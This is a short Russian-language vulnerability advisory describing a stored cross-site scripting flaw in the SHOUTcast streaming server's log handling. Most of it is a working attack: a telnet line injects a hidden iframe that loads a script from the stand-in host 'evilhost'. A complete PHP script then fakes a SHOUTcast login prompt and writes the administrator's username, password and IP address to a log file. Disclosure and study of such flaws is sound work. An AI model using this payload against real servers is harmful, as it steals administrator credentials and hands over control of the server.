SHOUTcast — Winamp система потокового аудио от Nullsoft. 

Уязвимость в проверке правильности ввода обнаружена в SHOUTcast сервере. Удаленный пользователь может выполнить XSS нападение против администратора SHOUTcast. Пример: 

telnet localhost 8001
<IFrame src=http://evilhost/script.php width=0 height=0></iframe>changeme

Где script.php: 
<?php 
$fp = fopen(«log.txt»,»a+»);
if (!isset( $_SERVER[«PHP_AUTH_USER»] )) { 
header( ‘WWW-Authenticate: Basic realm=»Shoutcast Server»‘ ); 
header( ‘HTTP/1.0 401 Unauthorized’ ); 
echo ‘<HTML><HEAD>Unauthorized<title>SHOUTcast 
Administrator</title></HEAD></HTML>’;
exit; 
} else { 
fwrite($fp,’|’ . $_SERVER[«PHP_AUTH_USER»] . ‘|’ . 
$_SERVER[«PHP_AUTH_PW»] . ‘|’ . $_SERVER[«REMOTE_ADDR»] . $content);
}
fclose($fp);
?> 

Произвольный код сценария будет выполнен в браузере администратора системы, когда он
просматривает Log файлы в административном интерфейсе.



Оставить мнение